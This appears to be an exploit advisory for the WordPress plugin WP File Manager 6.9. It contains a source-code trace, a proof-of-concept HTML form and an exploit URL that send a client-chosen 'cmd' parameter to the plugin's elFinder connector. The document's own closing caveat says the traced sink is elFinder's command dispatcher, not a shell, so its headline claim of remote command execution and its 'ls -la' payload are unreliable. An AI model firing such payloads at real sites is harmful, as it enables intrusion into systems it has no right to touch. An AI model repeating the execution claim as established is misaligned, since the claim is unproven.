[-] Title : Wp File Manager V6.9 - Remote Command Execution
[-] Author : Milad Karimi
[-] Vendor : https://wordpress.org/plugins/wp-file-manager
[-] Category : Webapps
[-] Date : 2020-10-27
Vulnerable Page:
/elFinderConnector.class.php (reached as /lib/php/elFinderConnector.class.php in the exploit below)
Vulnerable Source (data-flow trace from the sink at line 160 back to the request input at line 74; the numbers are line numbers in elFinderConnector.class.php):
160: elFinder->exec($cmd, $args) // sink as reported by the trace: a method call on the elFinder object (presumably its command dispatcher), not the PHP exec() builtin; $cmd is taken verbatim from the request (lines 108 and 74 below)
108: $cmd = $src['cmd'] : '';
93: $src[$key][] = rawurldecode($value); // if((!$src || $maxInputVars) && $rawPostData = file_get_contents('php://input')), if(!$src || $maxInputVars < count($parts)), if(preg_match('/^(.+?)\[([^\[\]]*)\]$/', $key, $m)), if($idx) else ,
82: list($key, $value) = array_pad(explode('=', $part), 2, ''); // list() if((!$src || $maxInputVars) && $rawPostData = file_get_contents('php://input')), if(!$src || $maxInputVars < count($parts)),
81: foreach($parts as $part) // if((!$src || $maxInputVars) && $rawPostData = file_get_contents('php://input')), if(!$src || $maxInputVars < count($parts)),
78: $parts = explode('&', $rawPostData); // if((!$src || $maxInputVars) && $rawPostData = file_get_contents('php://input')),
76: $rawPostData = file_get_contents('php://input')){ // , trace stopped
80: $src = array(); // if((!$src || $maxInputVars) && $rawPostData = file_get_contents('php://input')), if(!$src || $maxInputVars < count($parts)),
74: $src = array_merge($_GET, $_POST) : $_GET; // source: the request parameters, fully client-controlled
requires (the traced lines sit inside this function):
71: ⇓ function run() // the trace above executes only when run() is invoked
Exploit Code:
<!-- PoC form: submits a client-chosen "cmd" parameter to the connector via GET -->
<html>
  <body>
    <form method="GET" action="http://localhost/lib/php/elFinderConnector.class.php">
      <input type="text" name="cmd">
      <input type="submit" value="RCE!">
    </form>
  </body>
</html>
Exploit URL (the space must be percent-encoded on the wire; note the rawurldecode() at trace line 93 applies to raw POST-body values, while $_GET is decoded by PHP itself):
http://localhost/lib/php/elFinderConnector.class.php?cmd=ls%20-la
Caveat: the sink in the trace is elFinder->exec($cmd, $args), a method on the elFinder object, not PHP's exec() builtin. The trace therefore shows that the request controls the value handed to elFinder as the command name; it does not by itself show that "ls -la" reaches a shell. Verify how that method handles $cmd in the plugin source before reporting shell-level command execution.